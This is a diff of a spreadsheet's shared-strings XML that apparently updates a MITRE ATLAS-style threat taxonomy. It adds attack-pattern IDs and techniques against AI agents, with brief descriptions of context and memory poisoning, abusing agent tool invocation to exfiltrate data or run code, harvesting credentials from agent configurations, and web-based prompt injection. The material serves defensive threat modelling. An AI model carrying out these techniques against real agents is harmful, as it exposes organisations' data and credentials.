-    <t>attack-pattern--9923b6b4-84f1-4ab4-8ccf-4d597db61a57</t>
-  </si>
-  <si>
-    <t>attack-pattern--adf16819-dc11-46a7-b23a-0ea57ccc093c</t>
-  </si>
-  <si>
-    <t>attack-pattern--dd1eaf06-1454-407d-b988-fab91c43c4f7</t>
-  </si>
-  <si>
-    <t>attack-pattern--526f7326-7de2-43d1-96ea-ae85b7cde54e</t>
-  </si>
-  <si>
-    <t>attack-pattern--251922b0-0e89-485b-9d7b-a292232c00d7</t>
-  </si>
-  <si>
-    <t>attack-pattern--813ac9e1-b1b4-464b-8acf-ef10ac84c11e</t>
-  </si>
-  <si>
-    <t>attack-pattern--4e2eac6a-fa8c-4bf8-967e-fdc3638c0cf9</t>
-  </si>
-  <si>
-    <t>attack-pattern--b0b3327f-a064-4943-82b2-951fba172c6e</t>
-  </si>
-  <si>
-    <t>attack-pattern--0691cb6f-ab52-4219-bb75-88c7ef77f02e</t>
-  </si>
-  <si>
-    <t>attack-pattern--bf1b4fb5-5f17-42d1-ab74-b2b67f485f29</t>
-  </si>
-  <si>
-    <t>attack-pattern--59ab5025-ad52-4e07-8c5a-e47be578cee5</t>
-  </si>
-  <si>
-    <t>attack-pattern--6e6da90a-2d48-40cf-b27d-614360d96a1e</t>
-  </si>
-  <si>
-    <t>attack-pattern--c606cfab-fa3d-4608-b01e-5f20ba14be1b</t>
-  </si>
-  <si>
-    <t>attack-pattern--e5f71e81-5f3e-4a82-8e99-d911d3e912f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--dffdbcc7-6db6-45aa-bd7e-f3fb62781b1b</t>
-  </si>
-  <si>
-    <t>attack-pattern--493d8a7f-63a0-419a-a8c7-74f85f1afab0</t>
-  </si>
-  <si>
-    <t>attack-pattern--1a1d7e16-bb89-46dd-aa36-e65c9047bf28</t>
-  </si>
-  <si>
-    <t>attack-pattern--2243a101-6295-4b82-8075-0c287d602a0e</t>
-  </si>
-  <si>
-    <t>attack-pattern--46843164-cb30-4c02-bc73-10ae30c6082a</t>
-  </si>
-  <si>
-    <t>attack-pattern--2e4aefac-93e9-42bc-9f19-300111f5de70</t>
-  </si>
-  <si>
-    <t>attack-pattern--84295c1b-dfa5-44a8-bb1f-47dcd0915635</t>
-  </si>
-  <si>
-    <t>attack-pattern--7eeb9b48-ed18-4e84-80b5-35b8223e3cf9</t>
-  </si>
-  <si>
-    <t>attack-pattern--1da3c8bb-158a-4ce1-8a92-93b2dee4b9a9</t>
-  </si>
-  <si>
-    <t>attack-pattern--7ff2727f-a254-4323-b182-e050bf0db8b0</t>
-  </si>
-  <si>
-    <t>attack-pattern--21c89e42-5b62-4e44-b83d-33e0eebb1eed</t>
-  </si>
-  <si>
-    <t>attack-pattern--83120ec7-b57c-49c5-a595-95a6982dfce0</t>
-  </si>
-  <si>
-    <t>attack-pattern--5aa7eba8-9cd1-4d20-b6e6-81b1ec780c9c</t>
-  </si>
-  <si>
-    <t>attack-pattern--746aeca6-ef05-4cad-8b29-5677cf1aa6d9</t>
-  </si>
-  <si>
-    <t>attack-pattern--bf0aa41d-6932-48a8-a357-346ce7f15eef</t>
-  </si>
-  <si>
-    <t>attack-pattern--0663b3da-43ac-4328-ad18-8fedf7a11b7a</t>
-  </si>
-  <si>
-    <t>attack-pattern--d6c070bc-ed05-4f84-8ebc-48b2df8d1fac</t>
-  </si>
-  <si>
-    <t>attack-pattern--ef74d856-323e-47d9-ad54-1f2a9a91fcf6</t>
-  </si>
-  <si>
-    <t>attack-pattern--dea40e9d-00d1-48fd-b26e-1d307490596c</t>
-  </si>
-  <si>
-    <t>attack-pattern--0c7c0e15-6279-4b1d-9707-3ce1a4dd4bb2</t>
-  </si>
-  <si>
-    <t>attack-pattern--a920c087-f6ce-4d6f-b7b8-6b4bafc1c351</t>
-  </si>
-  <si>
-    <t>attack-pattern--010bee3b-b3ce-4ba7-b936-16e8b56c4b3e</t>
-  </si>
-  <si>
-    <t>attack-pattern--84dc16b9-496a-451e-9a3f-1a2d6c19adbe</t>
-  </si>
-  <si>
-    <t>attack-pattern--60a5a4d5-78b3-4da4-89bc-d69e99333652</t>
-  </si>
-  <si>
-    <t>attack-pattern--2562ad09-faa4-4cdf-b3fb-41bcf5e06b2f</t>
-  </si>
-  <si>
-    <t>attack-pattern--24a70892-6962-43aa-bd44-59409b4f2803</t>
-  </si>
-  <si>
-    <t>attack-pattern--aa9644dc-7314-4d43-b595-bf1aad275fe0</t>
-  </si>
-  <si>
-    <t>attack-pattern--559daa3f-d332-47b8-8f9e-b883732564b4</t>
-  </si>
-  <si>
-    <t>attack-pattern--502d0b4b-0e4b-4294-9d50-e01093f1c291</t>
-  </si>
-  <si>
-    <t>attack-pattern--2dff830e-5644-41e7-93ff-fd0552da77fe</t>
-  </si>
-  <si>
-    <t>attack-pattern--d9135863-13f5-4d54-9434-c24c29b75b15</t>
-  </si>
-  <si>
-    <t>attack-pattern--291f82aa-907f-4ff9-a984-f04c1ab369bd</t>
-  </si>
-  <si>
-    <t>attack-pattern--2b522145-c609-4950-a106-e8c416dd1b41</t>
-  </si>
-  <si>
-    <t>attack-pattern--e65ae421-3b6c-449e-979f-b450d55d7423</t>
-  </si>
-  <si>
-    <t>attack-pattern--3756561f-0794-4127-91db-76a227d0f322</t>
-  </si>
-  <si>
-    <t>attack-pattern--68ec4fb6-15df-4841-abdd-8e0cd8534520</t>
-  </si>
-  <si>
-    <t>attack-pattern--985c6a6f-cad4-4c6a-bf32-0c3c58d57519</t>
-  </si>
-  <si>
-    <t>attack-pattern--3b88e298-97d5-451d-bbf5-1b13f5a2ade2</t>
-  </si>
-  <si>
-    <t>attack-pattern--084cfcad-b515-4c14-b36a-d97ba9063850</t>
-  </si>
-  <si>
-    <t>attack-pattern--5f879def-5cd4-45d3-b330-b5642ec2f741</t>
-  </si>
-  <si>
-    <t>attack-pattern--2de4e5ad-3cd3-4e53-beb8-1809a5aad790</t>
-  </si>
-  <si>
-    <t>attack-pattern--e8053731-4b16-4dbc-89e7-90accdffc0fd</t>
-  </si>
-  <si>
-    <t>attack-pattern--66f96e17-ee2c-4e77-aeb2-08d4db84621a</t>
-  </si>
-  <si>
-    <t>attack-pattern--9ce7dbb0-5b4e-480c-bec7-b7db65a1ad97</t>
-  </si>
-  <si>
-    <t>attack-pattern--f31b06f2-9f55-4477-a7df-278c6ea9e2d8</t>
-  </si>
-  <si>
-    <t>attack-pattern--66169e1d-131b-41f6-8ab5-8603d8f7a03b</t>
-  </si>
-  <si>
-    <t>attack-pattern--382d0462-947d-4d13-94a9-8dccc130fbc3</t>
-  </si>
-  <si>
-    <t>attack-pattern--2eeed418-51b8-4243-aea6-c802a6220e30</t>
-  </si>
-  <si>
-    <t>attack-pattern--cf106628-da5b-47b7-950f-9658391857af</t>
-  </si>
-  <si>
-    <t>attack-pattern--2fd7ca0a-8ca1-44fa-852f-f68db00b756d</t>
-  </si>
-  <si>
-    <t>attack-pattern--9ff99618-2174-4826-87c5-05603723a0b2</t>
-  </si>
-  <si>
-    <t>attack-pattern--5c410f62-7a6b-4759-947d-18e110e0706c</t>
-  </si>
-  <si>
-    <t>attack-pattern--b1f3f9e9-0b83-430e-81e1-05f90612009e</t>
-  </si>
-  <si>
-    <t>attack-pattern--92eb716e-f0e3-47de-8693-107bbd9d6554</t>
-  </si>
-  <si>
-    <t>attack-pattern--34a1e3e5-aef6-466e-b7fd-83f958a5aa75</t>
-  </si>
-  <si>
-    <t>attack-pattern--2d916848-8a92-4aa7-9b08-e8d61fe7af1f</t>
-  </si>
-  <si>
-    <t>attack-pattern--d8d9c2c8-8537-4515-887a-69aa029bc1c6</t>
-  </si>
-  <si>
-    <t>attack-pattern--928e83ff-b63f-473f-a0d3-a20fd9b8e9c7</t>
-  </si>
-  <si>
-    <t>attack-pattern--34975325-8143-4099-8af1-f83de967d177</t>
-  </si>
-  <si>
-    <t>attack-pattern--459dc255-c7a4-4aef-ba10-0b402f66c694</t>
-  </si>
-  <si>
-    <t>attack-pattern--279383cb-aaac-480d-aa91-39d44da7cd55</t>
-  </si>
-  <si>
-    <t>attack-pattern--ec881f8c-1b0f-466d-abef-5e56521fcd93</t>
-  </si>
-  <si>
-    <t>attack-pattern--a9bc20bd-9f88-4794-8ff3-cfd86a2bc2ae</t>
-  </si>
-  <si>
-    <t>attack-pattern--581a34ca-98ae-4a6a-94eb-38b6a6f16b22</t>
-  </si>
-  <si>
-    <t>attack-pattern--45238ba0-2955-4ab7-b26f-c8892d32d86b</t>
-  </si>
-  <si>
-    <t>attack-pattern--67487920-42fd-43d6-86d9-52e683e64c19</t>
-  </si>
-  <si>
-    <t>attack-pattern--6259d6af-6e70-4597-a577-8e71f2a15af7</t>
-  </si>
-  <si>
-    <t>attack-pattern--c476cf85-34c6-4c06-a4b5-062bd6001b38</t>
-  </si>
-  <si>
-    <t>attack-pattern--fe2f48bd-5f4c-49a2-9e65-cbf2d2267b46</t>
-  </si>
-  <si>
-    <t>attack-pattern--e7df1199-39d9-4d35-bee7-5f7f8ef8f9cd</t>
+    <t>attack-pattern--b218b168-e3d3-4582-bf1b-15d337ca1a81</t>
+  </si>
+  <si>
+    <t>attack-pattern--13ee69c8-da80-4724-a9d1-ecca9fdf9329</t>
+  </si>
+  <si>
+    <t>attack-pattern--3947e853-aae2-43ca-8e07-1842eb3a7861</t>
+  </si>
+  <si>
+    <t>attack-pattern--0303efbf-15e3-4236-b772-141d8a8a957d</t>
+  </si>
+  <si>
+    <t>attack-pattern--eae927c9-ae38-437c-8f1f-338eece6ac58</t>
+  </si>
+  <si>
+    <t>attack-pattern--c07b4911-2be0-427c-9334-c76f3947bd7d</t>
+  </si>
+  <si>
+    <t>attack-pattern--bf14e573-22d9-4468-9356-79f9191487fc</t>
+  </si>
+  <si>
+    <t>attack-pattern--63d80df5-c87c-424d-98bb-43792372b830</t>
+  </si>
+  <si>
+    <t>attack-pattern--b64aca28-b194-4e49-8879-942f679f64df</t>
+  </si>
+  <si>
+    <t>attack-pattern--ac579bcf-77d6-4ea4-8349-93eb05a5f405</t>
+  </si>
+  <si>
+    <t>attack-pattern--9a0f538c-4f1e-46ad-b06d-df735ce58335</t>
+  </si>
+  <si>
+    <t>attack-pattern--9da7e4e5-08e4-483f-a180-091e6a8bc388</t>
+  </si>
+  <si>
+    <t>attack-pattern--5d2730c6-9ddc-49c3-ae0c-17375997c920</t>
+  </si>
+  <si>
+    <t>attack-pattern--f0e2dee4-6dce-4282-8006-b2bbb394957f</t>
+  </si>
+  <si>
+    <t>attack-pattern--7d8cd3ac-5626-4dab-b3d7-7103ac11fb7e</t>
+  </si>
+  <si>
+    <t>attack-pattern--b7357acb-4af2-49d6-b793-2749c5a51d74</t>
+  </si>
+  <si>
+    <t>attack-pattern--c1ecb552-faa2-40d8-8b39-8fc7d21c4777</t>
+  </si>
+  <si>
+    <t>attack-pattern--e9718063-cb79-4a47-a489-1853cd30a19d</t>
+  </si>
+  <si>
+    <t>attack-pattern--49e7ba45-abe2-443d-9fdc-21bc215fc8c2</t>
+  </si>
+  <si>
+    <t>attack-pattern--2adc2fcf-9833-4b58-8b72-0f23c151b027</t>
+  </si>
+  <si>
+    <t>attack-pattern--462f63d3-affe-4159-86ce-af62b24ecb2b</t>
+  </si>
+  <si>
+    <t>attack-pattern--64cef9af-6422-4051-9511-90bcc3830f78</t>
+  </si>
+  <si>
+    <t>attack-pattern--37fa02ea-d6b5-4f6f-967e-e4acc931d9d1</t>
+  </si>
+  <si>
+    <t>attack-pattern--421cce7a-a6c9-4428-ad62-9f2c9a1dcdec</t>
+  </si>
+  <si>
+    <t>attack-pattern--60014399-fdb3-4b68-85a1-6e5ae0248286</t>
+  </si>
+  <si>
+    <t>attack-pattern--f995f734-67be-4598-95d5-5e707910e1fa</t>
+  </si>
+  <si>
+    <t>attack-pattern--644bda14-f7fd-42fc-94d2-9e880db3f5ff</t>
+  </si>
+  <si>
+    <t>attack-pattern--f62908be-535b-4207-b139-4d55d5cc95e5</t>
+  </si>
+  <si>
+    <t>attack-pattern--992f2f8d-278f-4a6c-863c-b11c70810773</t>
+  </si>
+  <si>
+    <t>attack-pattern--c4487497-d751-4a77-9619-bcdde1fccfd3</t>
+  </si>
+  <si>
+    <t>attack-pattern--b11d88b5-a5f4-488f-a103-42c49f4bf8d8</t>
+  </si>
+  <si>
+    <t>attack-pattern--f03ab3d3-b1d9-48e6-9b55-77d0d1cf1101</t>
+  </si>
+  <si>
+    <t>attack-pattern--c1b202de-c21f-4fa9-87c0-17371126caa3</t>
+  </si>
+  <si>
+    <t>attack-pattern--6c776227-c20d-4038-8226-7dd9f474eeb3</t>
+  </si>
+  <si>
+    <t>attack-pattern--198a9289-6edc-484b-b347-f39004e62f9b</t>
+  </si>
+  <si>
+    <t>attack-pattern--dd0d8a61-4897-497d-ba4b-2ef008b4ae9b</t>
+  </si>
+  <si>
+    <t>attack-pattern--d06217a3-8bab-4668-81f3-5516899bbbc3</t>
+  </si>
+  <si>
+    <t>attack-pattern--c6ac2f3b-cb35-4527-a4e5-af2c973f8d83</t>
+  </si>
+  <si>
+    <t>attack-pattern--4c1d603c-e34a-4a55-ac3a-7938391ed50f</t>
+  </si>
+  <si>
+    <t>attack-pattern--14d0547e-5c60-4efb-be3e-2bc3ffc9a5f5</t>
+  </si>
+  <si>
+    <t>attack-pattern--1fba424a-0258-4ee4-bb0f-6ea0470c1389</t>
+  </si>
+  <si>
+    <t>attack-pattern--d42d5756-756e-477e-a20b-36268980d4a4</t>
+  </si>
+  <si>
+    <t>attack-pattern--026d4f1a-bfd7-4f01-8455-2e80cd22eb0f</t>
+  </si>
+  <si>
+    <t>attack-pattern--7e38e6b0-635d-4959-8379-ef145793fdd8</t>
+  </si>
+  <si>
+    <t>attack-pattern--503a3253-3754-4d92-a75b-ec034664763e</t>
+  </si>
+  <si>
+    <t>attack-pattern--be2bcd5a-81a1-4bbf-8685-2415024985db</t>
+  </si>
+  <si>
+    <t>attack-pattern--ee6c39a4-6710-4f2a-b2a9-c3e26c52d462</t>
+  </si>
+  <si>
+    <t>attack-pattern--90842bc1-4bae-4e91-ba40-08b1450ab4ea</t>
+  </si>
+  <si>
+    <t>attack-pattern--fbefa1a4-6676-4c55-9c6b-568dc36517ae</t>
+  </si>
+  <si>
+    <t>attack-pattern--6fc7a8dd-9cc7-4d4e-9e57-af5963f323eb</t>
+  </si>
+  <si>
+    <t>attack-pattern--8df3e434-a1b6-4e92-aca0-2d8b728073f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--8141ba02-0fe1-4635-a328-06e77dc59e45</t>
+  </si>
+  <si>
+    <t>attack-pattern--eceb6948-b30c-4c5d-b9f9-8219bfd61120</t>
+  </si>
+  <si>
+    <t>attack-pattern--64f0bd2a-284b-4f60-a23f-a0647511c675</t>
+  </si>
+  <si>
+    <t>attack-pattern--3459fcfa-e9c0-4d21-967c-9362c97a847b</t>
+  </si>
+  <si>
+    <t>attack-pattern--0cf41cb3-883a-4b05-80df-90fa375dbb9f</t>
+  </si>
+  <si>
+    <t>attack-pattern--d5d86a7f-0cc9-4963-b8b2-8f4fbf8dda91</t>
+  </si>
+  <si>
+    <t>attack-pattern--c557225b-d26b-4692-a62d-3f0d44adacd1</t>
+  </si>
+  <si>
+    <t>attack-pattern--9d8f9836-d167-4d44-8517-3dd1884d6ee6</t>
+  </si>
+  <si>
+    <t>attack-pattern--79867aae-37f6-4e7a-be06-b1e2c87eb40f</t>
+  </si>
+  <si>
+    <t>attack-pattern--9a8bd016-e00c-490e-8c3f-c8622bf58457</t>
+  </si>
+  <si>
+    <t>attack-pattern--c162f260-b846-4095-8a01-15d2be92a85b</t>
+  </si>
+  <si>
+    <t>attack-pattern--a40a1d59-efc2-4f42-8f46-d713faf43dc2</t>
+  </si>
+  <si>
+    <t>attack-pattern--477fb8bb-47a7-453c-8d92-75c5e3897332</t>
+  </si>
+  <si>
+    <t>attack-pattern--378ff9ce-a89f-473b-8e94-010fc810bde5</t>
+  </si>
+  <si>
+    <t>attack-pattern--b9ff7676-0331-495a-a241-3d196fa04c76</t>
+  </si>
+  <si>
+    <t>attack-pattern--dd8c946a-e156-4721-b7b3-57193260a22d</t>
+  </si>
+  <si>
+    <t>attack-pattern--a85fec62-fdd6-47a8-b494-f6da6f2c8835</t>
+  </si>
+  <si>
+    <t>attack-pattern--72bcf68e-5ea9-4f40-a690-b8b952b623b8</t>
+  </si>
+  <si>
+    <t>attack-pattern--bdb6f7f8-01a1-4554-b349-4467e6d0b9af</t>
+  </si>
+  <si>
+    <t>attack-pattern--3c696a14-01cc-433a-b5f7-9c4129a924ed</t>
+  </si>
+  <si>
+    <t>attack-pattern--8fadf730-0543-4674-abd4-730185107b9e</t>
+  </si>
+  <si>
+    <t>attack-pattern--a335fd90-c271-442e-9574-1b9d6f377f0d</t>
+  </si>
+  <si>
+    <t>attack-pattern--01786a2e-ae41-4076-8ce9-5e7b11ef8d6f</t>
+  </si>
+  <si>
+    <t>attack-pattern--23e2b28f-d251-4169-88a4-c79754dbae01</t>
+  </si>
+  <si>
+    <t>attack-pattern--969491f5-40ee-43eb-b3a9-fe8ccabc8716</t>
+  </si>
+  <si>
+    <t>attack-pattern--e246d3f7-2289-4984-8eb3-03e7c6d548a2</t>
+  </si>
+  <si>
+    <t>attack-pattern--5fc25ea8-c3ab-4d3c-91d2-f167d94259f5</t>
+  </si>
+  <si>
+    <t>attack-pattern--c9b655d4-402a-4daa-a543-4d0162a020d9</t>
+  </si>
+  <si>
+    <t>attack-pattern--9195da08-adda-468c-9b31-0010bd742145</t>
+  </si>
+  <si>
+    <t>attack-pattern--51d90acd-cda0-4f30-9dc7-a1d025a342bb</t>
+  </si>
+  <si>
+    <t>attack-pattern--4ae85ed1-1a25-4f91-80fb-0dee8fe48835</t>
+  </si>
+  <si>
+    <t>attack-pattern--442b02a6-a512-4f96-b91d-8c41c10a3d01</t>
+  </si>
+  <si>
+    <t>attack-pattern--2ca400f1-e1f1-4aca-af63-d8899a40fbbc</t>
+  </si>
+  <si>
+    <t>attack-pattern--2d409d2f-6179-4c2e-a3ba-423c456782a8</t>
+  </si>
+  <si>
+    <t>attack-pattern--568dbc7d-eae6-4e21-8b63-b7974bcbe4e4</t>
+  </si>
+  <si>
+    <t>attack-pattern--206e1b6d-0089-41bf-90f7-a688c98d2e76</t>
+  </si>
+  <si>
+    <t>attack-pattern--b111a5e5-0dde-49cb-a638-98677875b483</t>
+  </si>
+  <si>
+    <t>attack-pattern--b48e5e54-4344-4fbe-a193-ecbdb1a0fce6</t>
+  </si>
+  <si>
+    <t>attack-pattern--cfb51915-efbe-4a78-8dbf-9610bc42e317</t>
+  </si>
+  <si>
+    <t>attack-pattern--ea80c588-0f92-452b-bd1e-714248185c42</t>
+  </si>
+  <si>
+    <t>attack-pattern--523aacd9-47b3-47b2-adb3-287d2a16e5af</t>
+  </si>
+  <si>
+    <t>attack-pattern--c231b0b5-73e4-40b2-bf23-5a99f7a8433b</t>
+  </si>
+  <si>
+    <t>attack-pattern--2934972e-3aad-40bb-b7ea-c605fa71e9fa</t>
+  </si>
+  <si>
+    <t>attack-pattern--6ea410ad-0277-49f7-bfe9-fdf7b39124f7</t>
+  </si>
+  <si>
+    <t>attack-pattern--c03c1cc3-0e57-4dcb-94d4-833fe159975a</t>
+  </si>
+  <si>
+    <t>attack-pattern--fbd4dc77-b6a7-409a-bd43-39c62be957e5</t>
+  </si>
+  <si>
+    <t>attack-pattern--bad3b9c2-9945-4ca1-b88e-3e5e6466b52c</t>
+  </si>
+  <si>
+    <t>attack-pattern--ac6052e6-adbb-40ee-90f3-2c3f8a0a6d24</t>
+  </si>
+  <si>
+    <t>attack-pattern--7e44120a-f478-43b6-9456-6359aab9c422</t>
+  </si>
+  <si>
+    <t>attack-pattern--f706cf8f-ab14-40ba-a863-07eff8e1039b</t>
+  </si>
+  <si>
+    <t>attack-pattern--6d510cb9-3cff-40c5-b7fc-9ef89470b112</t>
+  </si>
+  <si>
+    <t>attack-pattern--9e1c6a18-0f63-4e8a-bc77-1297e712c990</t>
+  </si>
+  <si>
+    <t>attack-pattern--012c03a7-02a4-450b-9bcc-085eed2c3133</t>
+  </si>
+  <si>
+    <t>attack-pattern--6cd0c4a1-ff0f-4435-965f-c7b11ca5a3ad</t>
+  </si>
+  <si>
+    <t>attack-pattern--edd8712e-a284-402e-893f-de3a3438aa17</t>
+  </si>
+  <si>
+    <t>attack-pattern--714544ac-a214-4a1d-8423-c55790cf884b</t>
+  </si>
+  <si>
+    <t>attack-pattern--a1c4e706-c952-4c86-86fc-ad047699d852</t>
+  </si>
+  <si>
+    <t>attack-pattern--7945ec46-b955-4d4e-a44f-222a82194f6d</t>
+  </si>
+  <si>
+    <t>attack-pattern--0713bc84-b9d7-4c31-b1fa-bb9c3e1aaa54</t>
+  </si>
+  <si>
+    <t>attack-pattern--f5f8140a-a8c2-4560-a98d-540a876c0c59</t>
+  </si>
+  <si>
+    <t>attack-pattern--80c8f683-043a-4274-bf2d-9b3f323f0651</t>
+  </si>
+  <si>
+    <t>attack-pattern--eac0a7d4-cc76-4dcf-a43f-edc5558d08b7</t>
+  </si>
+  <si>
+    <t>attack-pattern--edebbba0-5afa-4e61-a61b-b4da6c6b0484</t>
+  </si>
+  <si>
+    <t>attack-pattern--6c633b4c-cad7-46de-9933-561b00416895</t>
+  </si>
+  <si>
+    <t>attack-pattern--6ac205d8-78e1-4a6c-b41b-9f9730d59c13</t>
+  </si>
+  <si>
+    <t>attack-pattern--0864b5e6-c8b4-4af7-84c0-923e3a8973f1</t>
+  </si>
+  <si>
+    <t>attack-pattern--e15a2a8f-2318-46f1-b50f-557bb47c20cb</t>
+  </si>
+  <si>
+    <t>attack-pattern--7b8d0fc0-db3d-4d08-b748-8e13eb30a4aa</t>
+  </si>
+  <si>
+    <t>attack-pattern--1d50c938-8c28-4505-9b8a-a715a3c1b33e</t>
+  </si>
+  <si>
+    <t>attack-pattern--8d87dff5-d7ed-46d2-be6e-1a917d1a7f9b</t>
+  </si>
+  <si>
+    <t>attack-pattern--846ce442-cedd-4b92-85d2-00e2f634ecf2</t>
+  </si>
+  <si>
+    <t>attack-pattern--e6e9b7bc-f37b-4dea-a135-7bae180a616d</t>
+  </si>
+  <si>
+    <t>attack-pattern--1d4de99a-9620-40ab-a82f-da8b2436d97b</t>
+  </si>
+  <si>
+    <t>attack-pattern--678ba1d7-bb13-4074-89fc-19cb05375d56</t>
+  </si>
+  <si>
+    <t>attack-pattern--d4891783-2642-4210-b3e6-bd742979631f</t>
+  </si>
+  <si>
+    <t>attack-pattern--d9d06989-0df5-46ec-93f7-9640b6a6e631</t>
+  </si>
+  <si>
+    <t>attack-pattern--dca35ecd-dfe7-4e5c-8584-428c89ae59d4</t>
+  </si>
+  <si>
+    <t>attack-pattern--b3d3acc8-4ea1-49ae-9842-64578f6f9cfd</t>
+  </si>
+  <si>
+    <t>attack-pattern--5e3ede18-fa15-41f6-b900-c70befd558f9</t>
+  </si>
+  <si>
+    <t>AI Agent Context Poisoning</t>
+  </si>
+  <si>
+    <t>AI Agent Tool Invocation</t>
+  </si>
+  <si>
+    <t>AI Agent Tools</t>
   </si>
   <si>
     <t>AI Artifact Collection</t>
@@ -763,6 +862,9 @@
     <t>Acquire Public AI Artifacts</t>
   </si>
   <si>
+    <t>Activation Triggers</t>
+  </si>
+  <si>
     <t>Active Scanning</t>
   </si>
   <si>
@@ -805,9 +907,15 @@
     <t>Create Proxy AI Model</t>
   </si>
   <si>
+    <t>Credentials from AI Agent Configuration</t>
+  </si>
+  <si>
     <t>Data</t>
   </si>
   <si>
+    <t>Data from AI Services</t>
+  </si>
+  <si>
     <t>Data from Information Repositories</t>
   </si>
   <si>
@@ -826,6 +934,9 @@
     <t>Direct</t>
   </si>
   <si>
+    <t>Discover AI Agent Configuration</t>
+  </si>
+  <si>
     <t>Discover AI Artifacts</t>
   </si>
   <si>
@@ -853,6 +964,9 @@
     <t>Embed Malware</t>
   </si>
   <si>
+    <t>Embedded Knowledge</t>
+  </si>
+  <si>
     <t>Erode AI Model Integrity</t>
   </si>
   <si>
@@ -865,6 +979,9 @@
     <t>Evade AI Model</t>
   </si>
   <si>
+    <t>Exfiltration via AI Agent Tool Invocation</t>
+  </si>
+  <si>
     <t>Exfiltration via AI Inference API</t>
   </si>
   <si>
@@ -925,9 +1042,6 @@
     <t>LLM Jailbreak</t>
   </si>
   <si>
-    <t>LLM Plugin Compromise</t>
-  </si>
-  <si>
     <t>LLM Prompt Crafting</t>
   </si>
   <si>
@@ -958,12 +1072,18 @@
     <t>Masquerading</t>
   </si>
   <si>
+    <t>Memory</t>
+  </si>
+  <si>
     <t>Model</t>
   </si>
   <si>
     <t>Models</t>
   </si>
   <si>
+    <t>Modify AI Agent Configuration</t>
+  </si>
+  <si>
     <t>Modify AI Model Architecture</t>
   </si>
   <si>
@@ -997,6 +1117,12 @@
     <t>Publish Poisoned Models</t>
   </si>
   <si>
+    <t>RAG Credential Harvesting</t>
+  </si>
+  <si>
+    <t>RAG Databases</t>
+  </si>
+  <si>
     <t>RAG Poisoning</t>
   </si>
   <si>
@@ -1051,12 +1177,21 @@
     <t>Technical Blogs</t>
   </si>
   <si>
+    <t>Thread</t>
+  </si>
+  <si>
+    <t>Tool Definitions</t>
+  </si>
+  <si>
     <t>Train Proxy via Gathered AI Artifacts</t>
   </si>
   <si>
     <t>Train Proxy via Replication</t>
   </si>
   <si>
+    <t>Triggered</t>
+  </si>
+  <si>
     <t>Unsafe AI Artifacts</t>
   </si>
   <si>
@@ -1079,6 +1214,17 @@
   </si>
   <si>
     <t>White-Box Optimization</t>
+  </si>
+  <si>
+    <t>Adversaries may attempt to manipulate the context used by an AI agent's large language model (LLM) to influence the responses it generates or actions it takes. This allows an adversary to persistently change the behavior of the target agent and further their goals.
+Context poisoning can be accomplished by prompting the an LLM to add instructions or preferences to memory (See Memory) or by simply prompting an LLM that uses prior messages in a thread as part of its context (See [Thread](/techniques/AML.T0080.001)).</t>
+  </si>
+  <si>
+    <t>Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code.
+This may allow adversaries to execute API calls to integrated applications or services, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.</t>
+  </si>
+  <si>
+    <t>Adversaries may prompt the AI service to invoke various tools the agent has access to. Tools may retrieve data from different APIs or services in an organization.</t>
   </si>
   <si>
     <t>Adversaries may collect AI artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [AI Attack Staging](/tactics/AML.TA0001).
@@ -1138,6 +1284,10 @@
 Artifacts might be hosted on victim-controlled infrastructure, providing the victim with some information on who has accessed that data.</t>
   </si>
   <si>
+    <t>Adversaries may discover keywords or other triggers (such as incoming emails, documents being added, incoming message, or other workflows) that activate an agent and may cause it to run additional actions.
+Understanding these triggers can reveal how the AI agent is activated and controlled. This may also expose additional paths for compromise, as an adversary could attempt to trigger the agent from outside its environment and drive it to perform unintended or malicious actions.</t>
+  </si>
+  <si>
     <t xml:space="preserve">An adversary may probe or scan the victim system to gather information for targeting.
 This is distinct from other reconnaissance techniques that do not involve direct interaction with the victim system.
 </t>
@@ -1214,6 +1364,10 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may access the credentials of other tools or services on a system from the configuration of an AI agent. AI agents often utilize external tools or services to take actions.
+AI Agents often utilize external tools or services to take actions, such as querying databases, invoking APIs, or interacting with cloud resources. To enable these functions, credentials like API keys, tokens, and connection strings are frequently stored in configuration files. While there are secure methods such as dedicated secret managers or encrypted vaults that can be deployed to store and manage these credentials, in practice they are often placed in less protected locations for convenience or ease of deployment. If an attacker can read or extract these configurations, they may obtain valid credentials that allow direct access to sensitive systems outside the agent itself.</t>
+  </si>
+  <si>
     <t>Data is a key vector of supply chain compromise for adversaries.
 Every AI project will require some form of data.
 Many rely on large open source datasets that are publicly available.
@@ -1224,6 +1378,9 @@
 An adversary can poison a dataset by modifying the labels being generated by the labeling service.</t>
   </si>
   <si>
+    <t>Adversaries may use their access to a victim organization's AI-enabled services to collect proprietary or otherwise sensitive information. As organizations adopt generative AI in centralized services for accessing an organization's data, such as with chat agents which can access retrieval augmented generation (RAG) databases and other data sources via tools, they become increasingly valuable targets for adversaries.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may leverage information repositories to mine valuable information.
 Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
 Information stored in a repository may vary based on the specific instance or environment.
@@ -1256,6 +1413,11 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may attempt to discover configuration information for AI agents present on the victim's system. Agent configurations can include tools or services they have access to.
+Adversaries may directly access agent configuring dashboards or configuration files. They may also obtain configuration details by prompting the agent with questions such as "What tools do you have access to?"
+Adversaries can use the information they discover about AI agents to help with targeting.</t>
+  </si>
+  <si>
     <t>Adversaries may search private sources to identify AI learning artifacts that exist on the system and gather information about them.
 These artifacts can include the software stack used to train and deploy models, training and testing data management systems, container registries, software repositories, and model zoos.
 This information can be used to identify targets for further collection, exfiltration, or disruption, and to tailor and improve attacks.</t>
@@ -1290,7 +1452,7 @@
   </si>
   <si>
     <t>Adversaries may gain access to an AI system through a user visiting a website over the normal course of browsing, or an AI agent retrieving information from the web on behalf of a user. Websites can contain an [LLM Prompt Injection](/techniques/AML.T0051) which, when executed, can change the behavior of the AI model.
